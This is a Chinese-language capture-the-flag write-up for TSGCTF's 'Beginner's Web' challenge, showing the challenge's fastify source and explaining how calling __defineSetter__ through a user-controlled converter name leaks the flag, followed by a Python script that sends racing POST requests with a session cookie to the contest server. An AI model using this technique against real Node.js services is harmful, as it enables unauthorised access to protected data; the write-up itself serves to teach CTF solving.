const fastify = require('fastify');

 const nunjucks = require('nunjucks');

 const crypto = require('crypto');

 const converters = {};

 const flagConverter = (input, callback) => {

   const flag = '*** CENSORED ***';

   callback(null, flag);

 };

 const base64Converter = (input, callback) => {

   try {

     const result = Buffer.from(input).toString('base64');

     callback(null, result)

   } catch (error) {

     callback(error);

   }

 };

 const scryptConverter = (input, callback) => {

   crypto.scrypt(input, 'I like sugar', 64, (error, key) => {

     if (error) {

       callback(error);

     } else {

       callback(null, key.toString('hex'));

     }

   });

 };

 const app = fastify();

 app.register(require('point-of-view'), {engine: {nunjucks}});

 app.register(require('fastify-formbody'));

 app.register(require('fastify-cookie'));

 app.register(require('fastify-session'), {secret: Math.random().toString(2), cookie: {secure: false}});

 app.get('/', async (request, reply) => {

   reply.view('index.html', {sessionId: request.session.sessionId});

 });

 app.post('/', async (request, reply) => {

   if (request.body.converter.match(/[FLAG]/)) {

     throw new Error("Don't be evil :)");

   }

   if (request.body.input.length < 10) {

     throw new Error('Too short :(');

   }

   converters['base64'] = base64Converter;

   converters['scrypt'] = scryptConverter;

   converters[`FLAG_${request.session.sessionId}`] = flagConverter;

   const result = await new Promise((resolve, reject) => {

     converters[request.body.converter](request.body.input, (error, result) => {

       if (error) {

         reject(error);

       } else {

         resolve(result);

       }

     });

   });

   reply.view('index.html', {

     input: request.body.input,

     result,

     sessionId: request.session.sessionId,

   });

 });

 app.setErrorHandler((error, request, reply) => {

   reply.view('index.html', {error, sessionId: request.session.sessionId});

 });

 app.listen(59101, '0.0.0.0');

页面下方有显示出用户sessionID,结合源码不难看出可以利用flagConverter获得flag。因为有匹配,所以直接在converter参数传入FLAG_${request.session.sessionId}是行不通的。

1.利用__defineSetter__创造出名为FLAG_${request.session.sessionId}的数组键名 (${request.session.sessionId}表示sessionID)。

__defineSetter__介绍:https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Global_Objects/Object/__defineSetter__

__defineSetter__有两个参数,第一个是属性,第二个是函数。实际上就是绑个函数在指定属性上,当指定属性被赋值时,该函数会被调用。

converters[request.body.converter](request.body.input, (error, result)是用户可控的,(error, result)是箭头函数有两个参数


所以,input输入FLAG_${request.session.sessionId},converter参数输入__defineSetter__就可以成功把(error, result)绑在FLAG_${request.session.sessionId}上。FLAG_${request.session.sessionId}对应箭头函数的第一个参数error,最后能通过error把flag输出


此时,我们需要对promise有所了解    https://blog.csdn.net/new__person/article/details/103702562




因为 __defineSetter__没有被触发,promise不会有返回结果,所以http没有response




此时应该是这样的__defineSetter(FLAG_${request.session.sessionId},(error, result) => {if (error) {reject(error);} else {resolve(result);})


我们直接回到post




红色箭头所指的是一个赋值操作,只要执行这条语句就能触发我们之前的__defineSetter__。非常的amazing啊,我们只要再发一个不会在前两个if判断挂掉的包就能成功触发。触发之后就会把FLAG_${request.session.sessionId}传入箭头函数,作为其第一个参数error,通过reject(error)输出。这里使用python发包


exp:




#!/usr/bin/python3

import threading

import requests

import time

cookie = {"sessionId" : "Qaa0ZB24y079HE3S4XNVGrRYk0dnpAAY.ZyckOkEpT1GboSRLgcE1I%2BZ52%2FqfSQEZWkq1%2F5dyJB"}

def sendPayload():

    r = requests.post("http://35.221.81.216:59101",data={"converter":"__defineSetter__","input":"FLAG_Qaa0ZB24y079HE3S4XNVGrRYk0dnpAAY"},cookies=cookie)

    print(r.text)

threading.Thread(target=sendPayload).start()

requests.post("http://35.221.81.216:59101",data={"converter":"base64","input":"55555555555555555555"},cookies=cookie)




这题叫beginner可真是太艹了
本人js菜的抠脚,如果有不对的地方,望各位师傅斧正
												


											
TSGCTF-web  Beginner's Web (js内置方法__defineSetter__)的更多相关文章
	

    
								
  1. web前端学习(四)JavaScript学习笔记部分(6)-- js内置对象
		
    1.JS内置对象-什么是对象 1.1.什么是对象: JavaScript中的所有事物都是对象:字符串.数值.数组.函数 每个对象带有属性和方法 JavaScript允许自定义对象 1.2.自定义对象: ...
    
		
    2. 
						
  2. 4、js内置函数
		
    前言:上一篇我介绍了函数的基本概念,和一些简单的Demo.其实很多函数是js内置的,我们无需自己去写,直接拿过来用即可.内置函数分为全局函数和js内置对象的函数区别:全局函数不属于任何一个内置对象.理 ...
    
		
    3. 
						
  3. 4月5日--课堂笔记--JS内置对象
		
    JavaScript 4.5 一.    JS内置对象 1.数组Array a)创建语法1:var arr=new Array(参数); i.       没有参数:创建一个初始容量为0的数组 ii. ...
    
		
    4. 
						
  4. JS内置对象有哪些?
		
    JS内置对象分为数据封装类对象和其他对象 数据封装类对象:String,Boolean,Number,Array,和Object; 其他对象:Function,Arguments,Math,Date, ...
    
		
    5. 
						
  5. JS内置对象-String对象、Date日期对象、Array数组对象、Math对象
		
    一.JavaScript中的所有事物都是对象:字符串.数组.数值.函数... 1.每个对象带有属性和方法 JavaScript允许自定义对象 2.自定义对象 a.定义并创建对象实例 b.使用函数来定义 ...
    
		
    6. 
						
  6. js  内置对象和方法  示例
		
    JS内置函数不从属于任何对象,在JS语句的任何地方都可以直接使用这些函数.JS中常用的内置函数如下: 1.eval(str)接收一个字符串形式的表达式,并试图求出表达式的值.作为参数的表达式可以采用任 ...
    
		
    7. 
						
  7. 【ES6】改变 JS 内置行为的代理与反射
		
    代理(Proxy)可以拦截并改变 JS 引擎的底层操作,如数据读取.属性定义.函数构造等一系列操作.ES6 通过对这些底层内置对象的代理陷阱和反射函数,让开发者能进一步接近 JS 引擎的能力. 一.代 ...
    
		
    8. 
						
  8. 5月15日上课笔记-js中 location对象的属性、document对象、js内置对象、Date事件对象、
		
    location的属性: host: 返回当前主机名和端口号 定时函数: setTimeout( ) setInterval() 二.document对象 getElementById(); 根据ID ...
    
		
    9. 
						
  9. JS内置对象的原型不能重定义?只能动态添加属性或方法?
		
    昨天马上就快下班了,坐在我对面的同事突然问我一个问题,我说“爱过”,哈哈,开个玩笑.情况是这样的,他发现JS的内置对象的原型好像不能通过字面量对象的形式进行覆盖, 只能动态的为内置对象的原型添加属性或 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. 学习python的基本了解
			
    1) 使用python打印信息,分别打印你的名字.年龄.爱好# print('wang,23,shopping')# 2)使用变量,分别打印你的名字.年龄.爱好# name='wang'# age=2 ...
    
			
    2. 
						
  2. .NET高级调试系列-Windbg调试入门篇
			
    Windbg是.NET高级调试领域中不可或缺的一个工具和利器,也是日常我们分析解决问题的必备.准备近期写2篇精华文章,集中给大家分享一下如果通过Windbg进行.NET高级调试. 今天我们来一篇入门的 ...
    
			
    3. 
						
  3. yum本地源创建
			
    1 安装yum-utils包,yum-utils可以将需要的包下载在本地,安装后可以使用yumdownloader   yum -y install yum-utils* 2 建立目录/yum/yum ...
    
			
    4. 
						
  4. Redis高级特性
			
    redis的事务(transaction) 转载:https://blog.csdn.net/fmwind/article/details/78065236 redis中的事务是一组命令的集合.事务同 ...
    
			
    5. 
						
  5. python将列表按行写入csv
			
    import csv rows2 = ['abc1/ab1c','N'] for n in range(10): f = open("ok.csv", 'a',newline='' ...
    
			
    6. 
						
  6. js语法基础入门(6)
			
    6.函数 6.1.函数是什么? 函数就是具有名称和一定功能点代码块,这段代码块被封装起来,由一组语句组成,它们是JavaScript的基础模块单元,用于代码复用.信息隐藏和组合调用.一般来说,所谓编程 ...
    
			
    7. 
						
  7. Oracle 存储过程中的临时表数据自动清空
			
    问题叙述: 用 EXECUTE IMMEDIATE 动态往临时表插入数据,跟踪发现插入临时表后数据会立马清空,按理说等存储过程执行完才会清空临时表才对,现在是执行插入语句后下一步验证就发现临时表就没有 ...
    
			
    8. 
						
  8. pycharm一直显示Process finished with exit code 0
			
    后来排查发现原来是解释器的问题我之前使用的解释器是pycharm提供的虚拟解释器#####如何查看解释器点file–>new projects 如果选择的是2就是使用了pycharm提供的虚拟解 ...
    
			
    9. 
						
  9. Linux服务搭之 - 消息队列(RabbitMQ)
			
    本章主要目的是为了后续spring-cloud-bus做准备,讲述在Linux Centos7操作系统中搭建 RabbitMQ… - 什么是RabbitMQ RabbitMQ 是一个使用 Erlang ...
    
			
    10. 
						
  10. Pytest 单元测试框架标记用例
			
    1.Pytest 中标记用例 接参数 -k 来挑选要执行的测试项 pytest -k test_szdcs -s test_szdcs 为函数名称 -k 后面接的名称可以为函数名称.类名称.文件名称. ...
    
			
    11.